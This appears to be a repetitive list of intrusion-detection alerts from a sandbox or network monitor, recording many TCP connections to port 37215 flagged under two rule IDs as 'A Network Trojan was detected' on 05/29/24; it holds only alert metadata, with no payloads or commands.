                SID:2835222
                Source Port:47472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263162
                SID:2829579
                Source Port:33746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326396
                SID:2829579
                Source Port:52254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287778
                SID:2835222
                Source Port:32892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024536
                SID:2829579
                Source Port:48468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655898
                SID:2829579
                Source Port:36662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669541
                SID:2829579
                Source Port:39562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210919
                SID:2835222
                Source Port:32806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810847
                SID:2829579
                Source Port:57070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266598
                SID:2829579
                Source Port:55796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556807
                SID:2829579
                Source Port:46650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361603
                SID:2835222
                Source Port:44534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799481
                SID:2829579
                Source Port:37026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.580925
                SID:2835222
                Source Port:56574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626647
                SID:2829579
                Source Port:41726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455156
                SID:2829579
                Source Port:47126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902018
                SID:2835222
                Source Port:48376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463450
                SID:2829579
                Source Port:53752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870549
                SID:2835222
                Source Port:48412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629278
                SID:2835222
                Source Port:38248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840732
                SID:2835222
                Source Port:47290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325452
                SID:2835222
                Source Port:54038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.610875
                SID:2829579
                Source Port:60120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174909
                SID:2829579
                Source Port:55036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269984
                SID:2829579
                Source Port:39072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.094802
                SID:2829579
                Source Port:51358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.170300
                SID:2829579
                Source Port:57672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949748
                SID:2829579
                Source Port:54412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180565
                SID:2835222
                Source Port:56188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.941440
                SID:2835222
                Source Port:36630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284497
                SID:2829579
                Source Port:44724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434097
                SID:2835222
                Source Port:40480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.476452
                SID:2835222
                Source Port:57786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870385
                SID:2829579
                Source Port:60452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872954
                SID:2835222
                Source Port:60522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321387
                SID:2829579
                Source Port:51330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971915
                SID:2829579
                Source Port:51936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663539
                SID:2835222
                Source Port:42966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023264
                SID:2829579
                Source Port:33760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966306
                SID:2835222
                Source Port:44066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070128
                SID:2835222
                Source Port:54724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896847
                SID:2829579
                Source Port:54750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262484
                SID:2829579
                Source Port:45842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558690
                SID:2829579
                Source Port:60700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521260
                SID:2829579
                Source Port:50754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128843
                SID:2829579
                Source Port:40032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419931
                SID:2835222
                Source Port:41692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.823510
                SID:2829579
                Source Port:40572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228561
                SID:2835222
                Source Port:54778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038897
                SID:2829579
                Source Port:45134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.099356
                SID:2829579
                Source Port:33912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780015
                SID:2829579
                Source Port:46954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264841
                SID:2835222
                Source Port:50778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332479
                SID:2829579
                Source Port:33942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325066
                SID:2829579
                Source Port:47948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842394
                SID:2829579
                Source Port:45770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209883
                SID:2829579
                Source Port:60124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321245
                SID:2829579
                Source Port:55782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.031475
                SID:2835222
                Source Port:52538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318362
                SID:2835222
                Source Port:40550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184437
                SID:2829579
                Source Port:48320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101409
                SID:2835222
                Source Port:44432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583019
                SID:2835222
                Source Port:34412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683640
                SID:2829579
                Source Port:56044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100928
                SID:2835222
                Source Port:58720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277415
                SID:2835222
                Source Port:52092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278622
                SID:2835222
                Source Port:55738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278119
                SID:2835222
                Source Port:34836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.803125
                SID:2835222
                Source Port:38554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722398
                SID:2835222
                Source Port:58002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510203
                SID:2829579
                Source Port:45860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.976010
                SID:2835222
                Source Port:46270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783079
                SID:2835222
                Source Port:47626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567752
                SID:2829579
                Source Port:37222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419004
                SID:2829579
                Source Port:46590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848878
                SID:2835222
                Source Port:60952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624937
                SID:2829579
                Source Port:34428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660250
                SID:2835222
                Source Port:58474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218209
                SID:2835222
                Source Port:60314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959631
                SID:2829579
                Source Port:33914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.953187
                SID:2835222
                Source Port:32964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032748
                SID:2829579
                Source Port:39986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324776
                SID:2829579
                Source Port:39232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929928
                SID:2835222
                Source Port:47424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421118
                SID:2829579
                Source Port:40366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652356
                SID:2835222
                Source Port:55650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470341
                SID:2835222
                Source Port:37870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840908
                SID:2835222
                Source Port:52314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440663
                SID:2829579
                Source Port:56004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762955
                SID:2829579
                Source Port:36052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.617104
                SID:2835222
                Source Port:60976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872971
                SID:2835222
                Source Port:41192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.562145
                SID:2829579
                Source Port:46218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.237066
                SID:2829579
                Source Port:49318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166884
                SID:2829579
                Source Port:34988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324828
                SID:2829579
                Source Port:44432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814472
                SID:2835222
                Source Port:47160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860104
                SID:2835222
                Source Port:39248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.879469
                SID:2829579
                Source Port:38166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869389
                SID:2829579
                Source Port:44130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910986
                SID:2829579
                Source Port:50916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.045611
                SID:2835222
                Source Port:60854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876252
                SID:2835222
                Source Port:53822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731976
                SID:2835222
                Source Port:51524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931534
                SID:2829579
                Source Port:38744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640348
                SID:2835222
                Source Port:34384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945654
                SID:2829579
                Source Port:51980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339053
                SID:2829579
                Source Port:43470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238710
                SID:2835222
                Source Port:46244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526197
                SID:2835222
                Source Port:46728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910928
                SID:2829579
                Source Port:51434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526632
                SID:2829579
                Source Port:58192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240872
                SID:2835222
                Source Port:57768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.567138
                SID:2835222
                Source Port:44194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240499
                SID:2835222
                Source Port:43594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463175
                SID:2835222
                Source Port:43402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026774
                SID:2835222
                Source Port:47824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438545
                SID:2835222
                Source Port:60558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767702
                SID:2829579
                Source Port:48844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178687
                SID:2829579
                Source Port:41998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512306
                SID:2835222
                Source Port:41888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013468
                SID:2829579
                Source Port:38450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576000
                SID:2829579
                Source Port:49842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899252
                SID:2835222
                Source Port:52864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712659
                SID:2829579
                Source Port:40088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335961
                SID:2829579
                Source Port:56390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567672
                SID:2835222
                Source Port:49524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326154
                SID:2835222
                Source Port:34498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779792
                SID:2829579
                Source Port:51160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978732
                SID:2835222
                Source Port:41378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814961
                SID:2829579
                Source Port:34396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325170
                SID:2835222
                Source Port:44464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701103
                SID:2829579
                Source Port:46828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.940932
                SID:2835222
                Source Port:40984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288383
                SID:2835222
                Source Port:41432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977998
                SID:2829579
                Source Port:56044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558101
                SID:2835222
                Source Port:47996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441167
                SID:2835222
                Source Port:34816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464716
                SID:2835222
                Source Port:46994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804273
                SID:2829579
                Source Port:39998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876138
                SID:2835222
                Source Port:47258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584295
                SID:2835222
                Source Port:39368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947723
                SID:2835222
                Source Port:56290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660080
                SID:2835222
                Source Port:54672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225634
                SID:2829579
                Source Port:56982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.108949
                SID:2829579
                Source Port:40028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.047364
                SID:2835222
                Source Port:50714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421931
                SID:2829579
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979302
                SID:2835222
                Source Port:40522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815494
                SID:2829579
                Source Port:57858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278597
                SID:2835222
                Source Port:37368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668476
                SID:2829579
                Source Port:50718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872737
                SID:2835222
                Source Port:57402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655153
                SID:2829579
                Source Port:37596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764148
                SID:2835222
                Source Port:39838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375576
                SID:2829579
                Source Port:58992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278204
                SID:2835222
                Source Port:36448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650638
                SID:2829579
                Source Port:49860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.585072
                SID:2829579
                Source Port:41032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233315
                SID:2829579
                Source Port:59152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815746
                SID:2829579
                Source Port:53614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460604
                SID:2829579
                Source Port:57744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437497
                SID:2829579
                Source Port:57884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856077
                SID:2835222
                Source Port:37428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.689066
                SID:2829579
                Source Port:59792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001923
                SID:2829579
                Source Port:57980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783495
                SID:2835222
                Source Port:51148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.729471
                SID:2829579
                Source Port:37456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794312
                SID:2835222
                Source Port:57796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617325
                SID:2835222
                Source Port:57612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.525260
                SID:2829579
                Source Port:59560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767736
                SID:2829579
                Source Port:44880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611070
                SID:2829579
                Source Port:52360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817064
                SID:2835222
                Source Port:49940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.435946
                SID:2829579
                Source Port:48352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567356
                SID:2829579
                Source Port:42628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135613
                SID:2829579
                Source Port:54180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.865514
                SID:2835222
                Source Port:46128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.137869
                SID:2835222
                Source Port:58998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027360
                SID:2829579
                Source Port:40342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282404
                SID:2835222
                Source Port:58472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766192
                SID:2835222
                Source Port:57184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321052
                SID:2835222
                Source Port:33194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316383
                SID:2835222
                Source Port:44040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.853850
                SID:2835222
                Source Port:59924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631279
                SID:2829579
                Source Port:59716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773083
                SID:2835222
                Source Port:33822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586560
                SID:2835222
                Source Port:51430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286484
                SID:2829579
                Source Port:32986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462776
                SID:2829579
                Source Port:40462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371464
                SID:2829579
                Source Port:49204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432452
                SID:2829579
                Source Port:34398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075110
                SID:2829579
                Source Port:57088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280595
                SID:2835222
                Source Port:53540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464512
                SID:2835222
                Source Port:45042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515767
                SID:2829579
                Source Port:52658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876178
                SID:2829579
                Source Port:48546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324998
                SID:2829579
                Source Port:36646
                Destination Port:37215
